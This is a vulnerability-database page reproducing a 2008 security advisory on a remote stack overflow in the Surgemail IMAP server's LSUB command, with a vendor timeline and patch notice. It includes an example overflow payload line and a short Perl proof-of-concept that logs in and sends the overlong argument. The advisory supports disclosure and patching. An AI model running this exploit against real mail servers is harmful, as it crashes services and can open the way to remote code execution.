Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

INFIGO-2008-03-07.txt

🗓️ 21 Mar 2008 00:00:00Reported by Leon JuranicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Surgemail 38k4 IMAP server remote stack overflow advisory with remote code execution vulnerability, impacting latest available version and PoC exploit. Vendor released patch available

Code
`   
INFIGO IS Security Advisory #ADV-2008-03-07  
http://www.infigo.hr/en/  
  
  
  
  
Title: Surgemail 38k4 IMAP server remote stack overflow  
Advisory ID: INFIGO-2008-03-07  
Date: 2008-03-21  
Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-03-07  
Impact: Remote code execution  
Risk Level: High  
Vulnerability Type: Remote  
  
  
  
  
==[ Overview  
  
SurgeMail Mail Server Software Suite - combines advanced features, high  
performance and ease of use. Works on Windows, UNIX (Linux, Solaris etc.),  
Mac OSX, FreeBSD and others. Surgemail integrated email server is an  
Antispam Server, Antivirus Server, Webmail Server, Groupware Server,   
Blog Server and much more.   
  
  
  
==[ Vulnerability  
  
A remote vanilla stack overflow vulnerability exists in the Surgemail IMAP   
server. The vulnerability is caused due to a boundary error in the IMAP   
server, when processing overly long arguments of the 'LSUB' command.  
The vulnerability results in a simple stack overflow condition that can be  
trivially exploited.  
  
Example:  
a002 LSUB "//AA:" * 12000 + " " + "//AA:" * 21000 + "\r\n"  
  
  
  
==[ Affected Version  
  
The vulnerability has been identified in the latest available 38k4-4.   
It was tested on Windows XP SP2.  
  
  
  
==[ Fix  
  
The vendor released a new version that fixes the vulnerability available at  
http://www.netwinsite.com/surgemail/.  
  
  
  
==[ PoC Exploit  
  
http://www.infigo.hr/files/surgemail.pl  
  
#  
#  
# Surgemail stack overflow PoC exploit - latest version  
# Coded by Leon Juranic <[email protected]>  
# http://www.infigo.hr/en/  
#  
  
use IO::Socket;  
  
  
$host = "192.168.0.15";  
$user = "test";  
$pass = "test";  
$str = "//AA:";  
  
$sock = IO::Socket::INET->new(PeerAddr => $host,  
PeerPort => "143",  
Proto => "tcp") || die ("Cannot connect!!!\n");  
  
print $a = <$sock>;  
print $sock "a001 LOGIN $user $pass\r\n";  
print $a = <$sock>;  
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";  
print $a = <$sock>;  
  
  
  
==[ Vendor status  
  
01.09.2008 - Initial contact  
01.10.2008 - Initial vendor response  
03.19.2008 - Vendor status update - Patch available  
03.21.2008 - Coordinated public disclosure  
  
  
  
==[ Credits  
  
Vulnerability discovered by Leon Juranic <[email protected]>.  
  
  
  
==[ INFIGO IS Security Contact  
  
INFIGO IS,  
  
WWW : http://www.infigo.hr/en/  
E-mail : [email protected]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
surgemail serverremote code executionstack overflowvulnerabilitypatchpoc exploitinfigo is
21